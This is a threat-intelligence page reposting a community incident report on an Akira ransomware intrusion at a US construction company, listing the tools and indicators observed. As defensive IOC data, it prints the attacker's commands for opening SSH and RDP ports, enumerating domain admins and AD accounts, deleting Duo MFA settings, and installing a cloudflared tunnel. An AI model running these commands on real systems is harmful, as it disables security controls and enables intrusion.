BushidoUK ToolMatrix CommunityReports: CR-009-AKIRA-AUG-2025

Fecha
18 Jun 2026
Actor
bushidouk
Tipo
Report
Pais
United States
Sector
Software
Confianza
high
75
Prioridad analitica
Media

Basado en actor, pais, IOCs, TTPs, filtracion y calidad de contexto.

5IOCs
0TTPs
bushidoukActor
United StatesPais
Executive Summary
Recurso del BushidoUK Ransomware Tool Matrix - CommunityReports.

Key Points

  • Source: CommunityReports/CR-009-AKIRA-AUG-2025.md
  • BushidoUK Tool Matrix

CommunityReports: CR-009-AKIRA-AUG-2025.md

Recurso del BushidoUK Ransomware Tool Matrix - CommunityReports.

Community Report 009 - Akira August 2025

Contributor Details

``

- Real Name: Ben Folland

- Online Handle: @polygonben

- Employer: Huntress

`

---

Adversary

`

- Named adversary: Akira

`

---

Incident Details

`

- Time of Incident: August 2025

- Victim Sector: Construction

- Victim Country: USA

- Victom Size: 1-100

`

---

Observed Tools

| Discovery | RMM Tools | Defense Evasion | Credential Theft | OffSec | Networking | LOLBAS | Exfiltration |

|---|---|---|---|---|---|---|---|

| | | | | Impacket | Cloudflared | net | |

| | | | | | OpenSSH | netsh | |

| | | | | | | nltest | |

---

Indicators of Compromise (IOCs)

`

Powershell History:

New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22

cmd

nltest /dclist:

nltest /trusted_domains

net group /domain "Domain Admins"

clsssss

cls

Install-WindowsFeature RSAT-AD-PowerShell

Get-ADUser -Filter -Properties | Select-Object distinguishedName, Enabled, CanonicalName, CN, Name, SamAccountName, MemberOf, Company, Title, Description, Created, Modified, PasswordLastSet, LastLogonDate, logonCount, Department, telephoneNumber, MobilePhone, OfficePhone, EmailAddress, mail, HomeDirectory, homeMDB > C:\programdata\adu.txt

Get-ADComputer -Filter -Property | Select-Object Enabled, DNSHostName, IPv4Address, OperatingSystem, Description > C:\programdata\adc_light2.txt:

Command Line / Process Tree:

- WmiPrvSE.exe // Impacket wmiexec lateral movement to run:

- Remove-Item -Path "HKLM:\Software\Duo Security" -Recurse -Force

- netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

- reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

- C:\ProgramData\ssh\cloudflared.exe service install eyJ[...REDACTED...]SJ9 // Known Akira Cloudflared token

Staging:

- C:\ProgramData\

Ransomware Binary:

- N/A

``

---

#### Any Related Sources

| Date Published | Report |

|---|---|

| 04/08/2025 | https://www.huntress.com/blog/exploitation-of-sonicwall-vpn |

Referencias

Diamond Model

Adversary
bushidouk
Ver perfil →
Victim
BushidoUK ToolMatrix CommunityReports: CR-009-AKIRA-AUG-2025
United States
Capability
Report
Infrastructure
www.huntress.com

Relations

Mapa de nodos relacionados por IOCs compartidos, actor, enlaces IntelTracker/OSINT, campanas y victimas observadas. Haz click en un nodo para abrir el post, filtro o fuente.

19 enlaces
Nodo actual
BushidoUK ToolMatrix CommunityReports: CR-009-AKIRA-AUG-2025
bushidouk · United States

Indicadores de Compromiso (IOCs)

TipoValorContextoOSINT
File adu.txt Artefacto observado VT OffSec SOCRadar
File adc_light2.txt Artefacto observado VT OffSec SOCRadar
File WmiPrvSE.exe Artefacto observado VT OffSec SOCRadar
File cloudflared.exe Artefacto observado VT OffSec SOCRadar
Domain www.huntress.com Extraido del contenido VT OffSec SOCRadar

Referencias y enlaces

→ Perfil del actor bushidouk en el blog → Ver bushidouk en IntelTracker → Fuente OSINT: github.com→ Fuente OSINT: github.com → Buscar bushidouk en APTTrail → Repositorio APTTrail → Mas incidentes en United States → Buscar en Google News → Analizar en VirusTotal → Feed RSS del blog
← Volver al panel de inteligencia

Incidentes recientes